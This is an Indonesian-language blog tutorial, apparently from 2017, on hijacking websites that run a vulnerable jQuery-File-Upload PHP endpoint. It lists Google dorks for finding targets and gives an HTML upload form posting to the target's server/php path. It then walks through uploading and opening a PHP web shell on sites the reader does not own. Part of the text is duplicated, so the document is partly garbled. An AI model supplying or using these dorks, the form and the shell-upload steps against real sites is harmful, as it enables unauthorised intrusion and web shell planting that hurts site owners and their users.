Jumat, 17 November 2017
Oke, saya Mrskreepkiller langsung saja tutornya yah sob ga enak lama lama
Pertama tama kita cari
pacar
eh salah maksudnya dorknya
Dork:
- inurl:/Jquery-File-Upload/server/
- inurl:/server/php/
- inurl:/server/php/files/
Use your brain :D
Exploit : http://www.target.com/assets/global/plugins/jquery-file-upload/server/php/
http://www.target.com/[path]/server/php/
CSRF:
<form method="POST" action="http://www.target.com/[path]/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
(Simpan dalam bentuk html)
Step 1
Dorking di www.google.com / yang lainnya, disini aya memakai dork inurl:/server/php/files/
- inurl:/Jquery-File-Upload/server/
- inurl:/server/php/
- inurl:/server/php/files/
Use your brain :D
Exploit : http://www.target.com/assets/global/plugins/jquery-file-upload/server/php/
http://www.target.com/[path]/server/php/
CSRF:
<form method="POST" action="http://www.target.com/[path]/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
(Simpan dalam bentuk html)
Step 1
Dorking di www.google.com / yang lainnya, disini aya memakai dork inurl:/server/php/files/
Step 2
Cari cari dan mencari, jika sudah dapat masukan exploitnya
jika vuln maka akan terlihat seperti ini
Step 3
Masukan url target nya pada CSRF. Setelah itu buka pada browser > klik Browse.. > Pilih shell kalian > klik Upload
Step 4
Setelah upload shell nanti akan muncul seperti ini
itu contoh kita berhasil upload shell :D ( kalo size nya false/file not allowed berarti gagal )
Step 5
Akses shell http://www.target.com/[path]/server/php/files/shellkita.php
Oke, sekian tutor dari saya semoga berhasil hehe:D
NB: jika ingin tebas index disarankan jangan ya. karya orang itu lhoo. nitip file aja
